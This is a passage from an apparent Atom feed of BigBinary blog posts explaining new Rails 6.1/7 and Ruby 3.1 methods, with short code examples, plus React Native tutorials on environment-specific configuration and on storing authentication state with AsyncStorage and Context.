      <link href="https://www.bigbinary.com/blog/rails-7-adds-enumerable-sole"/>
      <updated>2021-04-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-enumerable-sole</id>
      <content type="html"><![CDATA[<p>Rails 7 introduces the <code>Enumerable#sole</code> method, which can be used to find andassert the presence of exactly one element in the enumerable.</p><p>The <code>Enumerable#sole</code> method is an add-on for<a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/FinderMethods.html#method-i-sole">ActiveRecord::FinderMethods#sole</a>and<a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/FinderMethods.html#method-i-find_sole_by">#find_sole_by</a>methods, which were recently added in Rails 6.1. Please checkour blog (Link is not available)for more details on it.</p><pre><code class="language-ruby">=&gt; list = [&quot;Sole Element&quot;]=&gt; list.sole=&gt; &quot;Sole Element&quot;=&gt; hash = { foo: &quot;bar&quot; }=&gt; hash.sole=&gt; [:foo, &quot;bar&quot;]</code></pre><p>The <code>Enumerable#sole</code> method raises <code>Enumerable::SoleItemExpectedError</code> error ifthe enumerable is empty or contains multiple elements. When the sole element is<code>nil</code>, it will be returned as result.</p><pre><code class="language-ruby">=&gt; list = [nil]=&gt; list.sole=&gt; nil=&gt; list = []=&gt; list.sole=&gt; `Enumerable::SoleItemExpectedError (no item found)`=&gt; list = [&quot;Apple&quot;, &quot;Orange&quot;]=&gt; list.sole=&gt; `Enumerable::SoleItemExpectedError (multiple items found)`</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/40914">pull request</a> formore details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Handling environment specific configurations in React Native]]></title>
       <author><name>Sourav Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/handling-environment-specific-configurations-in-react-native"/>
      <updated>2021-04-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/handling-environment-specific-configurations-in-react-native</id>
      <content type="html"><![CDATA[<p>Many modern-day applications now go through different stages of the productcycle such as development, staging, production etc.</p><p>Having different environment variables for each environment will make it a loteasier to manage any application. This article is intended to share one solutionto address this problem in React Native. We will be using a library called<a href="https://github.com/luggit/react-native-config">react-native-config</a> for thispurpose; you can also try<a href="https://github.com/zetachang/react-native-dotenv">react-native-dotenv</a>.</p><p>We will be focusing on having three different bundles containing configurationfiles for development, staging and production environments.</p><h2>Installing react-native-config</h2><p>Install the package:</p><pre><code class="language-bash">yarn add react-native-config</code></pre><p>For iOS also run <code>pod install</code> after package is installed.</p><h2>Setup for Android</h2><p>Add below line of code to <code>android/app/build.gradle</code> to apply plugin.</p><pre><code class="language-diff">apply plugin: &quot;com.android.application&quot;+ apply from: project(':react-native-config').projectDir.getPath() + &quot;/dotenv.gradle&quot;</code></pre><p>Create three files in root folder of the project <code>.env.development</code>,<code>.env.staging</code> &amp; <code>.env.production</code> which will contain our environment variables.</p><pre><code class="language-text">// .env.developmentAPI_URL=https://myapi.development.com// .env.stagingAPI_URL=https://myapi.staging.com// .env.productionAPI_URL=https://myapi.com</code></pre><p>Now we need to define <code>envConfigFiles</code> in <code>build.gradle</code> associating builds withenv files. To achieve this, add the below code before the <code>apply from</code> call,and be sure to leave the build cases in lowercase.</p><pre><code class="language-diff">+ project.ext.envConfigFiles = [+   productiondebug: &quot;.env.production&quot;,+   productionrelease: &quot;.env.production&quot;,+   developmentrelease: &quot;.env.development&quot;,+   developmentdebug: &quot;.env.development&quot;,+   stagingrelease: &quot;.env.staging&quot;,+   stagingdebug: &quot;.env.staging&quot;+ ]apply from: project(':react-native-config').projectDir.getPath() + &quot;/dotenv.gradle&quot;</code></pre><p>Next, add <code>productFlavors</code> in <code>build.gradle</code>, just below <code>buildTypes</code>.</p><pre><code class="language-text">flavorDimensions &quot;default&quot;  productFlavors {    production {}    staging {      // We can have build-specific configurations here. Like using applicationIdSuffix to create different package name (ex. &quot;.staging&quot;)    }    development {}  }</code></pre><p>Names should match based on <code>productFlavors</code>, so <code>productiondebug</code> will match<code>debug</code> in this case and generate debug build of App with configuration from<code>.env.production</code>.</p><p>Also add <code>matchingFallbacks</code> in <code>buildTypes</code> as shown below:</p><pre><code class="language-diff">buildTypes {  debug {    signingConfig signingConfigs.debug+   matchingFallbacks = ['debug', 'release']  }  release {    signingConfig signingConfigs.debug    minifyEnabled enableProguardInReleaseBuilds    proguardFiles getDefaultProguardFil  (&quot;proguard-android.txt&quot;), &quot;proguard-rules  pro&quot;  } }</code></pre><p>Add the below scripts to <code>scripts</code> in the <code>package.json</code> file.</p><pre><code class="language-javascript">&quot;android:staging&quot;: &quot;react-native run-android --variant=stagingdebug&quot;,&quot;android:staging-release&quot;: &quot;react-native run-android --variant=stagingrelease&quot;,&quot;android:dev&quot;: &quot;react-native run-android --variant=developmentdebug&quot;,&quot;android:dev-release&quot;: &quot;react-native run-android --variant=developmentrelease&quot;,&quot;android:prod&quot;: &quot;react-native run-android --variant=productiondebug&quot;,&quot;android:prod-release&quot;: &quot;react-native run-android --variant=productionrelease&quot;,</code></pre><p>Now, to have a debug build with staging environment, run:</p><pre><code class="language-bash">yarn android:staging</code></pre><p>Or, to have a release build with staging environment, run:</p><pre><code class="language-bash">yarn android:staging-release</code></pre><h2>Setup for iOS</h2><p>In iOS we will create three new schemes <code>TestAppDevelopment</code>, <code>TestAppStaging</code> &amp;<code>TestAppProduction</code> containing configuration files for development, staging andproduction environments respectively.</p><p>To create schemes, open the project in xcode &amp; do the following:</p><p>In the Xcode menu, go to Product &gt; Scheme &gt; Edit Scheme.</p><p>Click Duplicate Scheme on the bottom and name it <code>TestAppDevelopment</code> and checkthe <code>shared</code> checkbox.</p><p>We will repeat the above steps two more times (for <code>TestAppStaging</code> &amp;<code>TestAppProduction</code>).</p><p>Now edit the newly generated scheme. Expand &quot;Build&quot; settings and click&quot;Pre-actions&quot;, and under the plus sign select &quot;New Run Script Action&quot;. Selectproject from the <code>Provide build settings from</code> dropdown.</p><p>Where it says &quot;Type a script or drag a script file&quot;, type:</p><pre><code class="language-bash">cp &quot;${PROJECT_DIR}/../.env.staging&quot; &quot;${PROJECT_DIR}/../.env&quot;  # replace .env.staging for your file</code></pre><p>Add the below scripts to <code>scripts</code> in the <code>package.json</code> file.</p><pre><code class="language-javascript">&quot;ios:dev&quot;: &quot;react-native run-ios --scheme 'TestAppDevelopment'&quot;,&quot;ios:prod&quot;: &quot;react-native run-ios --scheme 'TestAppProduction'&quot;,&quot;ios:staging&quot;: &quot;react-native run-ios --scheme 'TestAppStaging'&quot;,</code></pre><p>Now, to have a build with staging environment, run:</p><pre><code class="language-bash">yarn ios:staging</code></pre><p>And it will run the application with staging configuration.</p><h2>Accessing environment variables</h2><p>Once the setup is complete, we can access the variables as shown below:</p><pre><code class="language-javascript">import Config from &quot;react-native-config&quot;;Config.API_URL;//`https://myapi.staging.com`</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3.1 accumulates Enumerable#tally results]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-1-accumulates-enumerable-tally-results"/>
      <updated>2021-04-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-1-accumulates-enumerable-tally-results</id>
      <content type="html"><![CDATA[<p>We already know the<a href="https://ruby-doc.org/core-2.7.0/Enumerable.html#method-i-tally">Enumerable#tally</a>method is used to count the occurrences of each element in an <code>Enumerable</code>collection. The <code>#tally</code> method was introduced in ruby 2.7.0. Please check<a href="https://bigbinary.com/blog/ruby-2-7-adds-enumerable-tally">our blog</a> for moredetails on it.</p><p>Ruby 3.1 introduces an optional hash argument for the <code>Enumerable#tally</code> methodto count. If a hash is given, the total number of occurrences of each element isadded to the hash values and the final hash is returned.</p><h2>Ruby 2.7.0+</h2><pre><code class="language-ruby">=&gt; letters = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;a&quot;, &quot;d&quot;, &quot;c&quot;, &quot;a&quot;, &quot;c&quot;, &quot;a&quot;]=&gt; result = letters.tally=&gt; {&quot;a&quot;=&gt;4, &quot;b&quot;=&gt;1, &quot;c&quot;=&gt;3, &quot;d&quot;=&gt;1}</code></pre><h2>Before Ruby 3.1</h2><pre><code class="language-ruby">=&gt; new_letters = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;a&quot;, &quot;c&quot;, &quot;a&quot;]=&gt; new_letters.tally(result)=&gt; ArgumentError (wrong number of arguments (given 1, expected 0))</code></pre><h2>After Ruby 3.1</h2><pre><code class="language-ruby">=&gt; new_letters = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;a&quot;, &quot;c&quot;, &quot;a&quot;]=&gt; new_letters.tally(result)=&gt; {&quot;a&quot;=&gt;7, &quot;b&quot;=&gt;2, &quot;c&quot;=&gt;5, &quot;d&quot;=&gt;1}</code></pre><p>The value corresponding to each element in the hash must be an integer.Otherwise, the method raises <code>TypeError</code> on execution.</p><p>If the default value is defined for the given hash, it will be ignored and thecount of occurrences will be added in the returned hash.</p><pre><code class="language-ruby">=&gt; letters = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;a&quot;]=&gt; letters.tally(Hash.new(10))=&gt; {&quot;a&quot;=&gt;2, &quot;b&quot;=&gt;1, &quot;c&quot;=&gt;1}</code></pre><p>Here's the relevant <a href="https://github.com/ruby/ruby/pull/4318">pull request</a> and<a href="https://bugs.ruby-lang.org/issues/17744">feature discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds support for validating numeric values that fall within a specific range using the `in:` option]]></title>
       <author><name>Akanksha Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-validate-numericality-in-range-option"/>
      <updated>2021-04-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-validate-numericality-in-range-option</id>
      <content type="html"><![CDATA[<p>Before Rails 6.1, to validate a numerical value that falls within a specificrange, we had to use <code>greater_than_or_equal_to:</code> and <code>less_than_or_equal_to:</code>.</p><p>In the example below, we want to add a validation that ensures that each item inthe StockItem class has a quantity that ranges from 50 to 100.</p><pre><code class="language-ruby">class StockItem &lt; ApplicationRecord  validates :quantity, numericality: { greater_than_or_equal_to: 50, less_than_or_equal_to: 100 }endStockItem.create! code: 'Shirt-07', quantity: 40#=&gt; ActiveRecord::RecordInvalid (Validation failed: Quantity must be greater than or equal to 50)</code></pre><p>In Rails 6.1, to validate that a numerical value falls within a specific range,we can use the new <code>in:</code> option:</p><pre><code class="language-ruby">class StockItem &lt; ApplicationRecord  validates :quantity, numericality: { in: 50..100 }endStockItem.create! code: 'Shirt-07', quantity: 40#=&gt; ActiveRecord::RecordInvalid (Validation failed: Quantity must be in 50..100)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/41022">pull request</a> for moredetails on this feature.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3.1 adds Enumerable#compact and Enumerator::Lazy#compact]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-1-adds-enumerable-compact"/>
      <updated>2021-04-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-1-adds-enumerable-compact</id>
      <content type="html"><![CDATA[<p>We are familiar with the<a href="https://apidock.com/ruby/v1_9_3_392/Array/compact">compact</a> method associatedwith arrays. The <code>compact</code> method returns a copy of the array after removing all<code>nil</code> elements.</p><p>Ruby 3.1 introduces the <code>compact</code> method in the <code>Enumerable</code> module. Now we canuse the <code>compact</code> method along with the <code>Enumerator</code> and <code>Enumerator::Lazy</code>classes which include the <code>Enumerable</code> module.</p><h2>Before Ruby 3.1</h2><pre><code class="language-ruby">=&gt; enum = [1, nil, 3, nil, 5].to_enum=&gt; #&lt;Enumerator: ...&gt;=&gt; enum.compact=&gt; NoMethodError (undefined method `compact' for #&lt;Enumerator: [1, nil, 3, nil, 5]:each&gt;)=&gt;  enum.reject { |x| x.nil? }=&gt; [1, 3, 5]</code></pre><h2>After Ruby 3.1</h2><pre><code class="language-ruby">=&gt; enum = [1, nil, 3, nil, 5].to_enum=&gt; #&lt;Enumerator: ...&gt;=&gt; enum.compact=&gt; [1, 3, 5]</code></pre><p>We can access the <code>compact</code> method to remove all <code>nil</code> occurrences from anyclasses where we include the <code>Enumerable</code> module.</p><pre><code class="language-ruby">class Person  include Enumerable  attr_accessor :names  def initialize(names = [])    @names = names  end  def each &amp;block    @names.each(&amp;block)  endend=&gt; list = Person.new([&quot;John&quot;, nil, &quot;James&quot;, nil])=&gt; #&lt;Person:0x0000000101cd3de8 @names=[&quot;John&quot;, nil, &quot;James&quot;, nil]&gt;=&gt; list.compact=&gt; [&quot;John&quot;, &quot;James&quot;]</code></pre><p>Similarly, lazy evaluation can be chained with the <code>compact</code> method to removeall <code>nil</code> entries from the <code>Enumerator</code> collection.</p><pre><code class="language-ruby">=&gt; enum = [1, nil, 3, nil, 5].to_enum.lazy.compact=&gt; #&lt;Enumerator::Lazy: ...&gt;=&gt; enum.force=&gt; [1, 3, 5]=&gt; list = Person.new([&quot;John&quot;, nil, &quot;James&quot;, nil]).lazy.compact=&gt; #&lt;Enumerator::Lazy: ...&gt;=&gt; list.force=&gt; [&quot;John&quot;, &quot;James&quot;]</code></pre><p>Here's the relevant <a href="https://github.com/ruby/ruby/pull/3851">pull request</a> and<a href="https://bugs.ruby-lang.org/issues/17312">feature discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 allows constructors (build_association and create_association) on has_one :through associations]]></title>
       <author><name>Akanksha Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-allows-build-and-create-association-constructors-on-has-one-through"/>
      <updated>2021-04-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-allows-build-and-create-association-constructors-on-has-one-through</id>
      <content type="html"><![CDATA[<p>&lt;br/&gt;</p><h3>What are <code>build_association</code> and <code>create_association</code> constructors?</h3><p>When we declare either a <code>belongs_to</code> or <code>has_one</code> association,the declaring class automatically gains the following methodsrelated to the association:</p><ol><li>build_association(attributes = {})</li><li>create_association(attributes = {})</li></ol><p>In the above methods_<code>association</code> is replaced with the symbol(association name)passed as the first argument while declaring the associations.For example:</p><pre><code class="language-ruby">class Book &lt; ApplicationRecord  belongs_to :authorend@book.build_author(name: 'John Doe', email: 'john_doe@example.com')#=&gt; Returns a new Author object, instantiated with the passed attributes#=&gt; Links through the book's object foreign key#=&gt; New author object won't be saved in the database@book.create_author(name: 'John Doe', email: 'john_doe@example.com')#=&gt; Returns a new Author object, instantiated with the passed attributes#=&gt; Links through the book's object foreign key#=&gt; The new author object will be saved in the database after passing all of the validations specified on the Author model</code></pre><h3>Before Rails 7</h3><p>The <code>build_association</code> and <code>create_association</code> constructorswere only supported by<code>belongs_to</code> and <code>has_one</code> associations.</p><p>Consider the example below.We have a model, <strong>Member</strong>,that has a <code>has_one</code> associationwith the <strong>CurrentMembership</strong> model.It also has a <code>has_one :through</code> associationwith the <strong>Club</strong> model.</p><pre><code class="language-ruby">class Member &lt; ApplicationRecord  has_one :current_membership  has_one :club, through: :current_membershipend@member.build_club#=&gt; NoMethodError (undefined method `build_club' for #&lt;Member:0x00007f9ea2ebd3e8&gt;)#=&gt; Did you mean?  build_current_membership@member.create_club#=&gt; NoMethodError (undefined method `create_club' for #&lt;Member:0x00007f9ea2ebd3e8&gt;)#=&gt; Did you mean?  create_current_membership</code></pre><h3>After Rails 7</h3><p>Users are allowed to use constructors(<code>build_association</code> and <code>create_association</code>)on <code>has_one :through</code> associationsalong with <code>belongs_to</code> and <code>has_one</code> associations.</p><pre><code class="language-ruby">class Member &lt; ApplicationRecord  has_one :current_membership  has_one :club, through: :current_membershipend@member.build_club#=&gt; #&lt;Club:0x00007f9ea01a8ce0&gt;@member.create_club#=&gt; #&lt;Club:0x00007f9ea01a8ce0&gt;</code></pre><p>Check out this<a href="https://github.com/rails/rails/pull/40007">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds delegated_type to ActiveRecord]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-delegated-type-to-active-record"/>
      <updated>2021-04-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-delegated-type-to-active-record</id>
      <content type="html"><![CDATA[<p>Rails 6.1 adds <code>delegated_type</code> to ActiveRecord which makesit easier for models to share responsibilities.</p><h2>Before Rails 6.1</h2><p>Let's say we are building softwareto manage the inventory of an automobile company.It produces 2 types of vehicles, <code>Car</code> and <code>Motorcycle</code>.Both have <code>name</code> and <code>mileage</code> attributes.</p><p>Let's look into at least 2 different solutions to design this system.&lt;br/&gt;</p><h3>Single Table Inheritance</h3><p>In this approach, we combine all the attributes of various modelsand store them in a single table.Let's create a <code>Vehicle</code> modelandits corresponding table to store the data of both <code>Car</code> and <code>Motorcycle</code>.</p><pre><code class="language-ruby"># schema of Vehicle {id: Integer, type: String[car or motorcycle], name: String, mileage: Integer}class Vehicle &lt; ApplicationRecord  # put common logic hereendclass Car &lt; Vehicle  # put car specific code &amp; validationendclass Motorcycle &lt; Vehicle  # put motorcycle-specific code &amp; validationend</code></pre><p>This approach fits precisely for this scenariobut when the attributes of the various models differ,it becomes a pain point.Let's say at some point in time we add a <code>bs4_engine</code> boolean columnto track whether a <code>Motorcyle</code> has a <code>bs4_engine</code> or not.In the case of <code>Car</code>, <code>bs4_engine</code> will contain <code>nil</code>.As time passes, a lot of vehicle-specific attributes get addedand the database will be sparsely filled with a lot of <code>nil</code>.</p><h3>Polymorphic Relations</h3><p>With polymorphic associations,a model can belong to more than one other model, on a single association.</p><pre><code class="language-ruby"># schema {name: String, mileage: Integer}class Vehicle &lt; ApplicationRecord  belongs_to :vehicleable, polymorphic: trueend# schema {interior_color: String, adjustable_roof: Boolean}class Car &lt; ApplicationRecord  has_one :vehicle, as: :vehicleableend# schema {bs4_engine: Boolean, tank_color: String}class Motorcycle &lt; ApplicationRecord  has_one :vehicle, as: :vehicleableend</code></pre><p>Here, <code>Vehicle</code> is a class that contains common attributes,while <code>Motorcycle</code> and <code>Car</code> store any diverging attributes.This approach fixes the <code>nil</code> values,butto create a <code>Vehicle</code> record we now have to create a <code>Car</code> or <code>Motorcycle</code> first separately.</p><pre><code class="language-ruby"># creating new records&gt;&gt; bike = Motorcycle.create!( bs4_engine: false, tank_color: '#f2f2f2')#&lt;Motorcycle id: 1, bs4_engine: true, tank_color: '#f2f2f2', created_at: &quot;2021-01-17 ...&quot;&gt;&gt;&gt; vehicle = Vehicle.create!(vehicleable: bike, name: 'TS-1987', mileage: 45)#&lt;Vehicle id: 1, vehicleable_type: &quot;Motorcycle&quot;, vehicleable_id: 1, name: &quot;TS-1987&quot;, mileage: 45, created_at: ...&quot;&gt;# query&gt;&gt; b1 = Motorcycle.find(1) #=&gt; &lt;Motorcycle id: 1, bs4_engine: true, tank_color: '#f2f2f2', created_at: &quot;2021-01-17 ...&quot;&gt;&gt;&gt; b1.vehicle.name  #=&gt; TS-1987&gt;&gt; b1.vehicle.mileage  #=&gt; 45</code></pre><p>Now, let's say, we need to query Vehicles that are Motorcycles,or let's say we want to check whether a Vehicle is a Car or not.For all of these, we will have to write cumbersome logic and queries.</p><h2>Rails 6.1 <code>delegated_type</code></h2><p>Rails 6.1 brings <code>delegated_type</code>which fixes the problem discussed above and adds a lot of helper methods.To use it,we just need to replace polymorphic relation with <code>delegated_types</code>.</p><pre><code class="language-ruby">class Vehicle &lt; ApplicationRecord  delegated_type :vehicleable, types: %w[ Motorcycle Car ]end</code></pre><p>That is the only change we need to make to leverage the <code>delegated_type</code>.With this change,we can create both the delegator and delegatee at the same time.</p><pre><code class="language-ruby"># creating new records&gt;&gt; vehicle1 = Vehicle.create!(vehicleable: Car.new(interior_color: '#fff', adjustable_roof: true), name: 'TS78Z', mileage: 89)#&lt;Vehicle id: 3, vehicleable_type: &quot;Car&quot;, vehicleable_id: 2, name: &quot;TS78Z&quot;, mileage: 89, created_at: ...&quot;&gt;&gt;&gt; vehicle2= Vehicle.create!(vehicleable: Motorcycle.new(bs4_engine: false, tank_color: '#ff00bb'), name: 'BL96', mileage: 45)#&lt;Vehicle id: 4, vehicleable_type: &quot;Motorcycle&quot;, vehicleable_id: 5, name: &quot;BL96&quot;, mileage: 45, created_at: ...&quot;&gt;# Note: Just initializing the delegatee(Car.new/Motorcycle.new) is sufficient.</code></pre><p>When it comes to query capabilities, it adds a lot of delegated type convenience methods.</p><pre><code class="language-ruby"># Get all Vehicles that are Cars&gt;&gt; Vehicle.cars#&lt;ActiveRecord::Relation [#&lt;Vehicle id: 5, vehicleable_type: &quot;Car&quot;, vehicleable_id: 1, name: &quot;TS78Z&quot;, ...&quot;&gt;]&gt;# Get all Vehicles that are Motorcycles&gt;&gt; Vehicle.motorcycles#&lt;ActiveRecord::Relation [#&lt;Vehicle id: 1, vehicleable_type: &quot;Motorcycle&quot;, vehicleable_id: 1, name: &quot;BL96&quot;, ...&quot;&gt;]&gt;&gt;&gt; vehicle = Vehicle.find(3)#&lt;Vehicle id: 3, vehicleable_type: &quot;Car&quot;, vehicleable_id: 2, name: &quot;TS78Z&quot;, mileage: 89, created_at: ...&quot;&gt;# check whether a Vehicle is a Car or Motorcycle&gt;&gt; vehicle.car?  #=&gt; true&gt;&gt; vehicle.motorcylce? #=&gt; false# get vehicleable&gt;&gt; vehicle.car # &lt;Car id: 1, adjustable_roof: true, ...&gt;&gt;&gt; vehicle.motorcycle # nil</code></pre><p>So, <code>delegated_type</code> can be thought of as sugaron top of polymorphic relations that adds convenience methods.</p><p>Check out the<a href="https://github.com/rails/rails/pull/39341/files">pull request</a> to learn more.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Handling authentication state in React Native]]></title>
       <author><name>Ajay Sivan</name></author>
      <link href="https://www.bigbinary.com/blog/handling-authentication-state-in-react-native"/>
      <updated>2021-04-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/handling-authentication-state-in-react-native</id>
      <content type="html"><![CDATA[<p>Authentication flow is an essential part of any modern mobile application. Inthis article, we will see how to store and manage the authentication state inReact Native.</p><h2>Storing auth data</h2><p>Let's consider a basic scenario where we use a phone number and authenticationtoken for verifying API requests. Here we need to persist both the phone numberand authentication token. For storing these data we can use AsyncStorage, whichis a key-value data store commonly used to persist data locally in React Native.Even though we are storing two different values, we will always access themtogether and hence we can avoid multiple AsyncStorage calls by storing them as asingle key-value pair.</p><pre><code class="language-javascript">const auth = {  phone: PHONE_NUMBER, // User's phone number  token: AUTH_TOKEN, // Authentication token};AsyncStorage.setItem(&quot;auth&quot;, JSON.stringify(auth));// AsyncStorage supports only string values - so we have to serialize our object.</code></pre><p>After storing the data we can use the <code>AsyncStorage.getItem()</code> API to retrieveit.</p><h3>Things to keep in mind while using AsyncStorage</h3><p>It should be clear from the name that AsyncStorage calls are asynchronous soconsider the following while using it.</p><ul><li><p>Avoid unnecessary AsyncStorage calls - Async calls will take time and mayaffect user experience.</p></li><li><p>Reuse data once fetched - Use higher-level state or central state managementlike Context, Redux etc to manage data used in multiple places.</p></li><li><p>Asynchronous calls might fail and we should handle exceptions properly.</p></li><li><p>In Android, AsyncStorage has a 6MB hard limit. You can change it by setting<code>AsyncStorage_db_size_in_MB</code> value in <code>gradle.properties</code> file.</p></li><li><p>AsyncStorage uses SQLite so beware of<a href="https://www.sqlite.org/limits.html">SQLite limits</a>.</p></li></ul><h2>Manage auth state globally with Context API</h2><p>In many apps we would use the current authentication state to displayappropriate content based on auth state, user type etc., so it's always good toput it in a centrally accessible place. We can use a central state managementlibrary like Redux or Context API. In this example we will use the built-inContext API.</p><p>Let's create an AuthContext and store all auth data in the Provider state byfetching it from AsyncStorage. We will also an API to update the data in state &amp;AsyncStorage.</p><h3>AuthContext</h3><pre><code class="language-javascript">// Create a contextconst AuthContext = createContext({});const AuthProvider = ({ children }) =&gt; {  const [auth, setAuthState] = useState(initialState);  // Get current auth state from AsyncStorage  const getAuthState = async () =&gt; {    try {      const authDataString = await AsyncStorage.getItem(&quot;auth&quot;);      const authData = JSON.parse(authDataString || {});      // Configure axios headers      configureAxiosHeaders(authData.token, authData.phone);      setAuthState(authData);    } catch (err) {      setAuthState({});    }  };  // Update AsyncStorage &amp; context state  const setAuth = async (auth) =&gt; {    try {      await AsyncStorage.setItem(&quot;auth&quot;, JSON.stringify(auth));      // Configure axios headers      configureAxiosHeaders(auth.token, auth.phone);      setAuthState(auth);    } catch (error) {      Promise.reject(error);    }  };  useEffect(() =&gt; {    getAuthState();  }, []);  return (    &lt;AuthContext.Provider value={{ auth, setAuth }}&gt;      {children}    &lt;/AuthContext.Provider&gt;  );};export { AuthContext, AuthProvider };</code></pre><p>When using axios we can configure the default auth headers and they will be usedfor all API requests. In case you are not using axios you can still get authvalues from the context.</p><pre><code class="language-javascript">const configureAxiosHeaders = (token, phone) =&gt; {  axios.defaults.headers[&quot;X-Auth-Token&quot;] = token;  axios.defaults.headers[&quot;X-Auth-Phone&quot;] = phone;};</code></pre><p>Now we can wrap our root component with <code>AuthProvider</code> and use the<code>useContext()</code> API in any component to access the auth state.</p><h2>Restricting routes(screens)</h2><p>Displaying appropriate screens and restricting access to screens based on theauth state is a common use case. In this section, we will see how to displayLogin/Signup screens if the user is not authenticated and a Home screen if theuser is already authenticated.</p><pre><code class="language-javascript">const App = () =&gt; {  // Get auth state from context  const { auth } = useContext(AuthContext);  return (    &lt;NavigationContainer&gt;      &lt;Stack.Navigator&gt;        {auth.token ? (          &lt;Stack.Screen name=&quot;Home&quot; component={Home} /&gt;        ) : (          &lt;&gt;            &lt;Stack.Screen name=&quot;Signup&quot; component={Signup} /&gt;            &lt;Stack.Screen name=&quot;Login&quot; component={Login} /&gt;          &lt;/&gt;        )}      &lt;/Stack.Navigator&gt;    &lt;/NavigationContainer&gt;  );};</code></pre><p>In the above snippet, we are conditionally rendering screens based on the authtoken rather than doing manual navigation using <code>navigate</code> function. This willhelp us restrict access to screens and avoid accessing restricted screens whennavigating from code or using the system back button in android.</p><h3>Things to keep in mind while using react navigation</h3><ul><li><p>Try to keep all top-level StackNavigator screens in one place to avoidunexpected behaviour.</p></li><li><p>Use conditional rendering to restrict screens.</p></li><li><p>Use <code>replace</code> instead of <code>navigate</code> when you want to remove the current screenfrom the back stack.</p></li><li><p>Use constants for screen names instead of string literals.</p></li></ul><h2>Enhancements</h2><ul><li><p>Store additional pieces of information like user type, username etc in theAuth context for easier access.</p></li><li><p>Improve AuthContext by using useReducer instead of useState.</p></li><li><p>Consider using state management libraries like Redux if you want to managelots of states globally.</p></li><li><p>Use a loader state to display a SplashScreen until we fetch the auth statefrom AsyncStorage for the first time.</p></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds Enumerable#in_order_of]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-enumerable-in-order-of"/>
      <updated>2021-03-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-enumerable-in-order-of</id>
      <content type="html"><![CDATA[<p>Rails 7 introduces the <code>Enumerable#in_order_of</code> method, by which we can orderand constrain any enumerable collection using a key-series pair.</p><pre><code class="language-ruby">=&gt; Item = Struct.new(:price)=&gt; items = [Item.new(24), Item.new(32), Item.new(16)]=&gt; items.in_order_of(:price, [16, 32, 24])=&gt; [#&lt;struct Item price=16&gt;, #&lt;struct Item price=32&gt;, #&lt;struct Item price=24&gt;]</code></pre><p>If any value in the series has no associated records in the enumerablecollection, it will be ignored and the rest will be returned in the result.</p><pre><code class="language-ruby">=&gt; items.in_order_of(:price, (15..25))=&gt; [#&lt;struct Item price=16&gt;, #&lt;struct Item price=24&gt;]</code></pre><p>Similarly, any values not included in the series will be omitted from the finalresult.</p><pre><code class="language-ruby">=&gt; items.in_order_of(:price, [16, 32])=&gt; [#&lt;struct Item price=16&gt;, #&lt;struct Item price=32&gt;]</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/41333">pull request</a> formore details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds ActiveRecord::Relation#excluding]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-activerecord-relation-excluding"/>
      <updated>2021-03-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-activerecord-relation-excluding</id>
      <content type="html"><![CDATA[<p>We might have used<a href="https://www.rubydoc.info/docs/rails/Array:excluding">Array#excluding</a> method toreturn an array after eliminating specific elements which are passed as anargument.</p><pre><code class="language-ruby">=&gt; [&quot;John&quot;, &quot;Sam&quot;, &quot;Oliver&quot;].excluding(&quot;Sam&quot;)=&gt; [&quot;John&quot;, &quot;Oliver&quot;]</code></pre><p>When it comes to active record queries, we usually make use of<a href="https://edgeguides.rubyonrails.org/active_record_querying.html#not-conditions">NOT condition</a>query to eliminate specific records from the result.</p><pre><code class="language-ruby">=&gt; users = User.where.not(id: current_user.id)=&gt; &quot;SELECT \&quot;users\&quot;.* FROM \&quot;users\&quot; WHERE \&quot;users\&quot;.\&quot;id\&quot; != 1&quot;</code></pre><p>This is simplified with Rails 7's newly-introduced<code>ActiveRecord::Relation#excluding</code> method.</p><pre><code class="language-ruby">=&gt; users = User.excluding(current_user)=&gt; &quot;SELECT \&quot;users\&quot;.* FROM \&quot;users\&quot; WHERE \&quot;users\&quot;.\&quot;id\&quot; != 1&quot;# We can also pass a collection of records as an argument=&gt; comments = Comment.excluding(current_user.comments)=&gt; &quot;SELECT \&quot;comments\&quot;.* FROM \&quot;comments\&quot; WHERE 